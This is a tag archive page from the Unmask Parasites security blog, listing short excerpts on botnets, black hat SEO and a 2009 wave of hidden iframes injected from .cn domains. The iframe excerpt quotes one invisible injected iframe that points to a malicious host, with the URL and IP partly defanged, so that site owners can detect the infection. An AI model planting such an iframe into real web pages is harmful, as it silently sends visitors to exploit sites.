Flash | Unmask Parasites. Blog.

Loading site search ...

Tweet Week: Jan 11-17, 2010

17 Jan 10 Filed in Tweet Week with 0 Comments

Selected short messages and links you might have missed if you don’t follow me on Twitter.

Security updates, botnets, Unmask Parasites »»

Tags: adobe botnet Flash LGPL milestone

Tweet Week: Dec 7-13, 2009

13 Dec 09 Filed in Tweet Week with 0 Comments

Selected short messages and links you might have missed if you don’t follow me on Twitter.

malware in error pages, torpig domains, black hat SEO »»

Tags: black hat seo Flash Torpig

Malicious “Income” IFrames from .CN Domains

15 Apr 09 Filed in Website exploits with 78 Comments

New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home pages.

The html code looks like this

<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

The domain names may vary but they always end with .cn. The domain names usually contain words lot and bet. They all reside on the same server with the IP address 94 .247 .3 .150. The iframes load pages with paths similar to “in.cgi?incomeNN”, where NN is some arbitrary number.
Continue »»

Tags: exploit Flash iframe PDF Wepawet

Tweet Week: Jan 11-17, 2010

Tweet Week: Dec 7-13, 2009

Malicious “Income” IFrames from .CN Domains

About this blog

Recent Posts

Categories

Recent Comments